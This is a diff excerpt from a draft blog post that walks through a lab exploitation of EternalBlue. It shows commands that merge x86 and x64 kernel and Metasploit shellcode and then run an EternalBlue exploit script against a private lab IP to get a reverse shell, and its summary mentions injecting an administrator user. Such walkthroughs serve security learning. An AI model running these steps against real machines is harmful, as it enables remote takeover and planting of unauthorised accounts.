hzsolt21/hzsolt21.github.io/_drafts/EternalBlue.markdown

 cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
 python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
 ```
-We now have our exploit binary. all we have to do is to execute the exploit and wait for our shell.
+We now have our exploit binary.
+All we have to do is to execute the exploit and wait for our shell.
 Going back one folder and executing the exploit, we are getting and error and a reverse shell.
 ```
 cd ..
 python eternalblue_exploit7.py 10.0.2.15 ./shellcode/sc_all
 ```
 <br>
+It probably would be fine to use just the x86 version and not merge the two exploit.
+But in case we only want to use one exploit then we should scan carefully for the windows version.
 ![withoutPipe](/img/EternalBlue/final.png)
 <h2>Summary:</h2>
 We looked at multiple ways to exploit EternalBlue with and without pipename.
 We created reverse shells and injected our own administrator user.